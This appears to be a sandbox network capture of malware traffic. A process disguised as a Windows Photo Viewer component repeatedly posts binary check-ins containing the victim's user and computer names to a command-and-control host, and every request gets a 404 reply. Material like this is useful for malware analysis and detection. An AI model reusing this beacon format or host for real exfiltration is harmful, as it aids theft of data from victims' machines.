Apr 3, 2024 06:38:31.366750956 CEST	244	OUT	POST /project/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: ebnsina.top Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: C8BF7604 Content-Length: 149 Connection: close
Apr 3, 2024 06:38:31.491519928 CEST	149	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 31 00 32 00 34 00 34 00 30 00 36 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 Data Ascii: (ckav.rujones124406JONES-PC0FDD42EE188E931437F4FBE2C
Apr 3, 2024 06:38:31.930062056 CEST	633	IN	HTTP/1.1 404 Not Found Date: Wed, 03 Apr 2024 04:38:31 GMT Content-Type: text/html; charset=UTF-8 Connection: close X-Powered-By: PHP/5.4.16 Status: 404 Not Found CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=l18R%2F%2BhCH54XOYKZ2alugMTtz%2BE8cHHB8vwG6KHpCg%2BVoID4pyeFgZxzazchjk%2FVV4Pi1Goe%2B5hnv3jywGkgp0ZRX3xQL0NFemDlyw%2F%2FbucPzZL7bdQ8Z3ggRQnNYQ%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 86e65e9e6d352588-MIA alt-svc: h3=":443"; ma=86400 Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
83	192.168.2.4	49824	104.21.13.124	80	7560	C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe

Timestamp	Bytes transferred	Direction	Data
Apr 3, 2024 06:38:32.210551023 CEST	244	OUT	POST /project/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: ebnsina.top Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: C8BF7604 Content-Length: 149 Connection: close
Apr 3, 2024 06:38:32.335652113 CEST	149	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 31 00 32 00 34 00 34 00 30 00 36 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 Data Ascii: (ckav.rujones124406JONES-PC0FDD42EE188E931437F4FBE2C
Apr 3, 2024 06:38:32.636657953 CEST	629	IN	HTTP/1.1 404 Not Found Date: Wed, 03 Apr 2024 04:38:32 GMT Content-Type: text/html; charset=UTF-8 Connection: close X-Powered-By: PHP/5.4.16 Status: 404 Not Found CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=7d1F8Mm8T1Q2T%2BSnb2SamjHJa5ZLVBv3GZ3tMl%2BDW6J60O%2BYDaO7iFttRc99ir8anht%2FAt6cXVF7rx53AoXqROQzoDJYtA3WI%2BwCqBrBGDOG0c%2BgxmIg1y50hyhGFw%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 86e65ea3bbe6b3e6-MIA alt-svc: h3=":443"; ma=86400 Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
84	192.168.2.4	49825	104.21.13.124	80	7560	C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe

Timestamp	Bytes transferred	Direction	Data
Apr 3, 2024 06:38:32.914570093 CEST	244	OUT	POST /project/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: ebnsina.top Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: C8BF7604 Content-Length: 149 Connection: close
Apr 3, 2024 06:38:33.038847923 CEST	149	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 31 00 32 00 34 00 34 00 30 00 36 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 Data Ascii: (ckav.rujones124406JONES-PC0FDD42EE188E931437F4FBE2C
Apr 3, 2024 06:38:33.328829050 CEST	619	IN	HTTP/1.1 404 Not Found Date: Wed, 03 Apr 2024 04:38:33 GMT Content-Type: text/html; charset=UTF-8 Connection: close X-Powered-By: PHP/5.4.16 Status: 404 Not Found CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=PapR3lkr3rGOZsieGrBx60Bk4PLwXP8FenBgGyhB6V7JU3MkVJAsyg7loWgrJOLUlpBEfHUgg5mYXE6gLoiae9JjZmBOJIRZpZ9kKaqnnOPVPrVm8%2FqqqPAwOQmjXg%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 86e65ea8186eb3e6-MIA alt-svc: h3=":443"; ma=86400 Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
85	192.168.2.4	49826	104.21.13.124	80	7560	C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe

Timestamp	Bytes transferred	Direction	Data
Apr 3, 2024 06:38:33.600213051 CEST	244	OUT	POST /project/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: ebnsina.top Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: C8BF7604 Content-Length: 149 Connection: close
Apr 3, 2024 06:38:33.724842072 CEST	149	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 31 00 32 00 34 00 34 00 30 00 36 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 Data Ascii: (ckav.rujones124406JONES-PC0FDD42EE188E931437F4FBE2C
Apr 3, 2024 06:38:34.018080950 CEST	623	IN	HTTP/1.1 404 Not Found Date: Wed, 03 Apr 2024 04:38:33 GMT Content-Type: text/html; charset=UTF-8 Connection: close X-Powered-By: PHP/5.4.16 Status: 404 Not Found CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Csb5nszHwwrWuiM5JIn%2FB0k4DCQld9uUotGo7YrA122Ia2v4qdbZPpX%2BJ9ld0vysCb6PFg70OEgdIxV%2FhEFp1oo7iYSncKYG4R1pC7eAGym3S2PkDTPFoJbJsac0Gg%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 86e65eac68b9da7f-MIA alt-svc: h3=":443"; ma=86400 Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
86	192.168.2.4	49827	104.21.13.124	80	7560	C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe

Timestamp	Bytes transferred	Direction	Data
Apr 3, 2024 06:38:34.282252073 CEST	244	OUT	POST /project/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: ebnsina.top Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: C8BF7604 Content-Length: 149 Connection: close
Apr 3, 2024 06:38:34.406924963 CEST	149	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 31 00 32 00 34 00 34 00 30 00 36 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 Data Ascii: (ckav.rujones124406JONES-PC0FDD42EE188E931437F4FBE2C
Apr 3, 2024 06:38:34.705063105 CEST	621	IN	HTTP/1.1 404 Not Found Date: Wed, 03 Apr 2024 04:38:34 GMT Content-Type: text/html; charset=UTF-8 Connection: close X-Powered-By: PHP/5.4.16 Status: 404 Not Found CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=16C%2Fn8IOukRuxyULlT46M%2F9SRJXRwAoCxL88v5hML74lue6TKypoZ7l5SWuNK0NNvGc0shdDoAsN2lKNmFql2dQqWBjUZRZTgVrrfzwXVMgiW4kIa0YqgSg5MWLV9w%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 86e65eb0a9b631ce-MIA alt-svc: h3=":443"; ma=86400 Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
87	192.168.2.4	49828	104.21.13.124	80	7560	C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe

Timestamp	Bytes transferred	Direction	Data
Apr 3, 2024 06:38:34.982501984 CEST	244	OUT	POST /project/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: ebnsina.top Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: C8BF7604 Content-Length: 149 Connection: close
Apr 3, 2024 06:38:35.107508898 CEST	149	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 31 00 32 00 34 00 34 00 30 00 36 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 Data Ascii: (ckav.rujones124406JONES-PC0FDD42EE188E931437F4FBE2C
Apr 3, 2024 06:38:35.398335934 CEST	621	IN	HTTP/1.1 404 Not Found Date: Wed, 03 Apr 2024 04:38:35 GMT Content-Type: text/html; charset=UTF-8 Connection: close X-Powered-By: PHP/5.4.16 Status: 404 Not Found CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=jGGlx5jViLulqrivYT722t6LDYJCNaMHSocZ5zmjRtrt6qQhsf4Bv6oPoZQwh3Cx%2BKDjMq4O5%2FT3bWsryGV08rfYccvxc4FJBcqixH6pcnfCb9jJ8Nj4BjHF0cuUYw%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 86e65eb50d5a74ac-MIA alt-svc: h3=":443"; ma=86400 Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
88	192.168.2.4	49829	104.21.13.124	80	7560	C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe

Timestamp	Bytes transferred	Direction	Data
Apr 3, 2024 06:38:35.672061920 CEST	244	OUT	POST /project/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: ebnsina.top Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: C8BF7604 Content-Length: 149 Connection: close
Apr 3, 2024 06:38:35.796123028 CEST	149	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 31 00 32 00 34 00 34 00 30 00 36 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 Data Ascii: (ckav.rujones124406JONES-PC0FDD42EE188E931437F4FBE2C
Apr 3, 2024 06:38:36.087373972 CEST	625	IN	HTTP/1.1 404 Not Found Date: Wed, 03 Apr 2024 04:38:36 GMT Content-Type: text/html; charset=UTF-8 Connection: close X-Powered-By: PHP/5.4.16 Status: 404 Not Found CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=ynRsA1%2BhOxCO5pftDgAmw2xp7ubVdpK5UPSUHxhxpz3OFNJZTl%2BvUC5oMcArqAvrSvzCKPM%2BcXeXGwvHD5v5c6GgLGZuYI5thTzt2ff9nC%2FvmISe2RDeb9bOB1GX2w%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 86e65eb95f5c4c16-MIA alt-svc: h3=":443"; ma=86400 Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
89	192.168.2.4	49830	104.21.13.124	80	7560	C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe

Timestamp	Bytes transferred	Direction	Data
Apr 3, 2024 06:38:36.358340025 CEST	244	OUT	POST /project/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: ebnsina.top Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: C8BF7604 Content-Length: 149 Connection: close
Apr 3, 2024 06:38:36.484271049 CEST	149	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 31 00 32 00 34 00 34 00 30 00 36 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 Data Ascii: (ckav.rujones124406JONES-PC0FDD42EE188E931437F4FBE2C
Apr 3, 2024 06:38:36.781783104 CEST	627	IN	HTTP/1.1 404 Not Found Date: Wed, 03 Apr 2024 04:38:36 GMT Content-Type: text/html; charset=UTF-8 Connection: close X-Powered-By: PHP/5.4.16 Status: 404 Not Found CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=%2Ff99OWiFXoi0IjF%2FPrloOlHgbF8juavsij8NXJV0UulIwYCz3QM1otyRj8LRO%2FfqsHtt%2FJD9YE0mSthHaUteZ9ZO6sqOKybiX%2B36myQoZpQPH7PkYNw3baGeot6B6w%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 86e65ebda9b0225d-MIA alt-svc: h3=":443"; ma=86400 Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
90	192.168.2.4	49831	104.21.13.124	80	7560	C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe

Timestamp	Bytes transferred	Direction	Data
Apr 3, 2024 06:38:37.043826103 CEST	244	OUT	POST /project/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: ebnsina.top Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: C8BF7604 Content-Length: 149 Connection: close
Apr 3, 2024 06:38:37.168632984 CEST	149	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 31 00 32 00 34 00 34 00 30 00 36 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 Data Ascii: (ckav.rujones124406JONES-PC0FDD42EE188E931437F4FBE2C
Apr 3, 2024 06:38:37.465118885 CEST	621	IN	HTTP/1.1 404 Not Found Date: Wed, 03 Apr 2024 04:38:37 GMT Content-Type: text/html; charset=UTF-8 Connection: close X-Powered-By: PHP/5.4.16 Status: 404 Not Found CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=rWrpWaQ96rp1TcH2GdsAvBvETI%2F%2BTqNLhYLFqOUNldUN1dmMRUHD6sYnFgFukWR1SjbBM3Vdcb6xJi2ckoGONIp7mbv7xM69rrDF4RkES1dTuCyobFIZ9SkQAMO6zw%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 86e65ec1efe59ab7-MIA alt-svc: h3=":443"; ma=86400 Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
91	192.168.2.4	49832	104.21.13.124	80	7560	C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe

Timestamp	Bytes transferred	Direction	Data
Apr 3, 2024 06:38:37.732708931 CEST	244	OUT	POST /project/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: ebnsina.top Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: C8BF7604 Content-Length: 149 Connection: close
Apr 3, 2024 06:38:37.857372999 CEST	149	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 31 00 32 00 34 00 34 00 30 00 36 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 Data Ascii: (ckav.rujones124406JONES-PC0FDD42EE188E931437F4FBE2C
Apr 3, 2024 06:38:38.151998997 CEST	625	IN	HTTP/1.1 404 Not Found Date: Wed, 03 Apr 2024 04:38:38 GMT Content-Type: text/html; charset=UTF-8 Connection: close X-Powered-By: PHP/5.4.16 Status: 404 Not Found CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=SZc%2FcLzKYnemFiAk6K0gWGJWnfaxRNdm7NpwMiLE8chQteKGhj3DHjDKGgO93omoQEEVn3uRNb2YDW4kmbGX7TSotnfs%2B5AgG%2F8dHCxzo0lx5GRrmYFEQ%2BJXyw52iA%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 86e65ec63dffb3c2-MIA alt-svc: h3=":443"; ma=86400 Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
92	192.168.2.4	49833	104.21.13.124	80	7560	C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe

Timestamp	Bytes transferred	Direction	Data
Apr 3, 2024 06:38:38.419517040 CEST	244	OUT	POST /project/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: ebnsina.top Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: C8BF7604 Content-Length: 149 Connection: close
Apr 3, 2024 06:38:38.544631958 CEST	149	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 31 00 32 00 34 00 34 00 30 00 36 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 Data Ascii: (ckav.rujones124406JONES-PC0FDD42EE188E931437F4FBE2C
Apr 3, 2024 06:38:38.836112022 CEST	621	IN	HTTP/1.1 404 Not Found Date: Wed, 03 Apr 2024 04:38:38 GMT Content-Type: text/html; charset=UTF-8 Connection: close X-Powered-By: PHP/5.4.16 Status: 404 Not Found CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Yf9uyvKZUwJ4jMlU973L993nWWS2mfSt0pJGoncvkFHjDz8XtvHEema5PDbgzt47yYcfKb5fNlvP%2F2ZFFLjuDCOzP%2FsRAopjaaeL6nd4gmUnjWP0mg9PYsFVzcO6kA%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 86e65eca89e709de-MIA alt-svc: h3=":443"; ma=86400 Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
93	192.168.2.4	49834	104.21.13.124	80	7560	C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe

Timestamp	Bytes transferred	Direction	Data
Apr 3, 2024 06:38:39.111241102 CEST	244	OUT	POST /project/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: ebnsina.top Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: C8BF7604 Content-Length: 149 Connection: close
Apr 3, 2024 06:38:39.235162020 CEST	149	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 31 00 32 00 34 00 34 00 30 00 36 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 Data Ascii: (ckav.rujones124406JONES-PC0FDD42EE188E931437F4FBE2C
Apr 3, 2024 06:38:39.536004066 CEST	627	IN	HTTP/1.1 404 Not Found Date: Wed, 03 Apr 2024 04:38:39 GMT Content-Type: text/html; charset=UTF-8 Connection: close X-Powered-By: PHP/5.4.16 Status: 404 Not Found CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=F0n8%2BUl4GNupzK7V5dCjH%2BbbF3bfbvUCw%2BiZwZFG0TDOvs4UjiOK0hWR9ce2Crp9RHUrXGxC%2FBrwEXz1AcJuhvsJKi2pRGu39J1Ffef2tcHWphX9%2FUdyiz6SMmg5wQ%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 86e65ecedc423713-MIA alt-svc: h3=":443"; ma=86400 Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
94	192.168.2.4	49835	104.21.13.124	80	7560	C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe

Timestamp	Bytes transferred	Direction	Data
Apr 3, 2024 06:38:40.106892109 CEST	244	OUT	POST /project/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: ebnsina.top Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: C8BF7604 Content-Length: 149 Connection: close
Apr 3, 2024 06:38:40.232371092 CEST	149	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 31 00 32 00 34 00 34 00 30 00 36 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 Data Ascii: (ckav.rujones124406JONES-PC0FDD42EE188E931437F4FBE2C
Apr 3, 2024 06:38:40.525443077 CEST	623	IN	HTTP/1.1 404 Not Found Date: Wed, 03 Apr 2024 04:38:40 GMT Content-Type: text/html; charset=UTF-8 Connection: close X-Powered-By: PHP/5.4.16 Status: 404 Not Found CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=EVkCqVv1897eJvJZ3L6oMnY1tFN%2FTAbFnt7rPJTCDMsa3Zv8DBnwAPjALaFJL8t6IL%2F1bBdxeEWwtcDsku9pgLBnLXdzF%2FxLDnxMtkdiRGt2n4R1Wb6FBnBtIjyw7g%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 86e65ed50b640a3a-MIA alt-svc: h3=":443"; ma=86400 Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
95	192.168.2.4	49836	104.21.13.124	80	7560	C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe

Timestamp	Bytes transferred	Direction	Data
Apr 3, 2024 06:38:42.416971922 CEST	244	OUT	POST /project/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: ebnsina.top Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: C8BF7604 Content-Length: 149 Connection: close
Apr 3, 2024 06:38:42.541822910 CEST	149	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 31 00 32 00 34 00 34 00 30 00 36 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 Data Ascii: (ckav.rujones124406JONES-PC0FDD42EE188E931437F4FBE2C
Apr 3, 2024 06:38:42.843430042 CEST	625	IN	HTTP/1.1 404 Not Found Date: Wed, 03 Apr 2024 04:38:42 GMT Content-Type: text/html; charset=UTF-8 Connection: close X-Powered-By: PHP/5.4.16 Status: 404 Not Found CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=JT%2B9hc5sBM5UB08Q3ZutarYsJpkM3PNK3%2FOnBacqFCPrTm7OKJxceu1pVsOTvhiAttBJFolTquq%2BQZpF7vtO%2BedxR3fN22LAL2a6ApVgScmrIFPvxA4OthamKEuIEA%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 86e65ee37a1f4c2c-MIA alt-svc: h3=":443"; ma=86400 Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
96	192.168.2.4	49837	104.21.13.124	80	7560	C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe

Timestamp	Bytes transferred	Direction	Data
Apr 3, 2024 06:38:43.265047073 CEST	244	OUT	POST /project/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: ebnsina.top Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: C8BF7604 Content-Length: 149 Connection: close
Apr 3, 2024 06:38:43.389837980 CEST	149	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 31 00 32 00 34 00 34 00 30 00 36 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 Data Ascii: (ckav.rujones124406JONES-PC0FDD42EE188E931437F4FBE2C
Apr 3, 2024 06:38:43.688081980 CEST	631	IN	HTTP/1.1 404 Not Found Date: Wed, 03 Apr 2024 04:38:43 GMT Content-Type: text/html; charset=UTF-8 Connection: close X-Powered-By: PHP/5.4.16 Status: 404 Not Found CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=2ruB%2BA6eUKSpV6se3ZY7dRsaNkyrkTA%2FKdFLJD89kyJcUyUCB%2FtqgUCtdLJZqSNmgq1%2FjOJRKynr6qI5%2Bl7P%2FqLIr7v25fwaRGG8apptwwlZ1Yrw5WfKnlL%2FdGIQAg%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 86e65ee8ca73dad5-MIA alt-svc: h3=":443"; ma=86400 Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
